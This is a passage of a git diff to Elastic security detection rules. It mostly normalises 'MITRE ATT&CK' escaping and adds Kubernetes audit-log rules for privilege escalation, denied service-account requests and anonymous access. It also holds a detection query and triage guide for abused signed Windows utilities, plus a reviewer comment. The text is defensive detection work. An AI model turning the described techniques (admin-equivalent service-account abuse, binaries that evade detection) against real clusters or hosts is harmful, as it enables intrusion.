b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_107.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_108.json b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_108.json index db78b50641c..339241733ef 100644 --- a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_108.json +++ b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_108.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_1.json b/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_1.json index de263665bf4..b821b7365f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_1.json +++ b/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_2.json b/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_2.json index ae4a4308f00..f1cb8b24e5a 100644 --- a/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_2.json +++ b/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_2.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", 
diff --git a/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_4.json b/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_4.json index 60a3591f8a8..453299f727d 100644 --- a/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_4.json +++ b/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_4.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_5.json b/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_5.json index 7e73fdc4a5c..cd2a1a136da 100644 --- a/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_5.json +++ b/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_5.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_6.json b/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_6.json new file mode 100644 index 00000000000..15b00c9ad13 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_6.json 
@@ -0,0 +1,98 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects a request to attach a controller service account to an existing or new pod running in the kube-system namespace. By default, controllers running as part of the API Server utilize admin-equivalent service accounts hosted in the kube-system namespace. Controller service accounts aren't normally assigned to running pods and could indicate adversary behavior within the cluster. An attacker that can create or modify pods or pod controllers in the kube-system namespace, can assign one of these admin-equivalent service accounts to a pod and abuse their powerful token to escalate privileges and gain complete cluster control.",
+ "false_positives": [
+ "Controller service accounts aren't normally assigned to running pods, this is abnormal behavior with very few legitimate use-cases and should result in very few false positives."
+ ],
+ "index": [
+ "logs-kubernetes.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Suspicious Assignment of Controller Service Account",
+ "note": "",
+ "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.verb : \"create\"\n and kubernetes.audit.objectRef.resource : \"pods\"\n and kubernetes.audit.objectRef.namespace : \"kube-system\"\n and kubernetes.audit.requestObject.spec.serviceAccountName:*controller\n",
+ "references": [
+ "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/kubernetes-privilege-escalation-excessive-permissions-in-popular-platforms"
+ ],
+ "related_integrations": [
+ {
+ "package": "kubernetes",
+ "version": "^1.4.1"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.annotations.authorization_k8s_io/decision",
+ "type": 
"keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.namespace", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.serviceAccountName", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "63c05204-339a-11ed-a261-0242ac120002", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Execution", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.001", + "name": "Default Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 6 + }, + "id": "63c05204-339a-11ed-a261-0242ac120002_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_3.json b/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_3.json index 3dbcbba478d..82dc892b8db 100644 --- a/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_3.json +++ b/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_3.json 
@@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_4.json b/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_4.json index 55add01b48c..5e7f69f5a89 100644 --- a/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_4.json +++ b/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_4.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_5.json b/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_5.json new file mode 100644 index 00000000000..c1a34c95448 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_5.json 
@@ -0,0 +1,76 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects when a service account makes an unauthorized request for resources from the API server. Service accounts follow a very predictable pattern of behavior. A service account should never send an unauthorized request to the API server. This behavior is likely an indicator of compromise or of a problem within the cluster. An adversary may have gained access to credentials/tokens and this could be an attempt to access or create resources to facilitate further movement or execution within the cluster.",
+ "false_positives": [
+ "Unauthorized requests from service accounts are highly abnormal and more indicative of human behavior or a serious problem within the cluster. This behavior should be investigated further."
+ ],
+ "index": [
+ "logs-kubernetes.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Denied Service Account Request",
+ "note": "",
+ "query": "event.dataset: \"kubernetes.audit_logs\"\n and kubernetes.audit.user.username: system\\:serviceaccount\\:*\n and kubernetes.audit.annotations.authorization_k8s_io/decision: \"forbid\"\n",
+ "references": [
+ "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections",
+ "https://kubernetes.io/docs/reference/access-authn-authz/authentication/#service-account-tokens"
+ ],
+ "related_integrations": [
+ {
+ "package": "kubernetes",
+ "version": "^1.4.1"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.annotations.authorization_k8s_io/decision",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.user.username",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "63c056a0-339a-11ed-a261-0242ac120002",
+ "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured 
data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Data Source: Kubernetes",
+ "Tactic: Discovery"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0007",
+ "name": "Discovery",
+ "reference": "https://attack.mitre.org/tactics/TA0007/"
+ },
+ "technique": [
+ {
+ "id": "T1613",
+ "name": "Container and Resource Discovery",
+ "reference": "https://attack.mitre.org/techniques/T1613/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 5
+ },
+ "id": "63c056a0-339a-11ed-a261-0242ac120002_5",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_3.json b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_3.json
index ade00ba4959..acb670b79b5 100644
--- a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_3.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_4.json b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_4.json
index 2e0c868b6bb..a26b32553ae 100644
--- a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_4.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access", 
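Review bot: The description calls the matched activity an "unauthorized request", but the query keys on `kubernetes.audit.annotations.authorization_k8s_io/decision: "forbid"`, which is an authorization denial for an already-authenticated service-account identity; a request whose token is rejected at the authentication stage never carries a `system:serviceaccount:` username and is outside this rule. I'd make the description say so, e.g. `This rule detects when an authenticated service account makes a request that the API server's authorizer denies (authorization decision "forbid").` The `note` field is empty, so an analyst gets no pointer to the `kubernetes.audit.objectRef` and `kubernetes.audit.requestURI` fields that show what the denied request tried to reach; a short triage paragraph naming them would be worth adding.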
diff --git a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_5.json b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_5.json index a1bc7e025f2..bef9aed5968 100644 --- a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_5.json +++ b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_5.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_6.json b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_6.json new file mode 100644 index 00000000000..7e1648ae03a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/63c057cc-339a-11ed-a261-0242ac120002_6.json 
@@ -0,0 +1,89 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects when an unauthenticated user request is authorized within the cluster. Attackers may attempt to use anonymous accounts to gain initial access to the cluster or to avoid attribution of their activities within the cluster. This rule excludes the /healthz, /livez and /readyz endpoints which are commonly accessed anonymously.",
+ "false_positives": [
+ "Anonymous access to the API server is a dangerous setting enabled by default. Common anonymous connections (e.g., health checks) have been excluded from this rule. All other instances of authorized anonymous requests should be investigated."
+ ],
+ "index": [
+ "logs-kubernetes.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Anonymous Request Authorized",
+ "note": "",
+ "query": "event.dataset:kubernetes.audit_logs\n and kubernetes.audit.annotations.authorization_k8s_io/decision:allow\n and kubernetes.audit.user.username:(\"system:anonymous\" or \"system:unauthenticated\" or not *)\n and not kubernetes.audit.requestURI:(/healthz* or /livez* or /readyz*)\n",
+ "references": [
+ "https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF"
+ ],
+ "related_integrations": [
+ {
+ "package": "kubernetes",
+ "version": "^1.4.1"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.annotations.authorization_k8s_io/decision",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestURI",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.user.username",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "63c057cc-339a-11ed-a261-0242ac120002",
+ "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.",
+ 
"severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Execution", + "Tactic: Initial Access", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.001", + "name": "Default Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 6 + }, + "id": "63c057cc-339a-11ed-a261-0242ac120002_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_102.json b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_102.json index 609cf74461e..6899c661ec5 100644 --- a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_102.json +++ b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_103.json b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_103.json index 6b57362088d..008ffdd8557 100644 --- a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_103.json 
+++ b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_103.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Signed Binary", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n event.type == \"start\"]\n [network where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n not cidrmatch(destination.ip,\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\",\n \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\",\n \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
diff --git a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_104.json b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_104.json
index ecf9ae5d42f..1ffaa7c7183 100644
--- a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_104.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Signed Binary", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
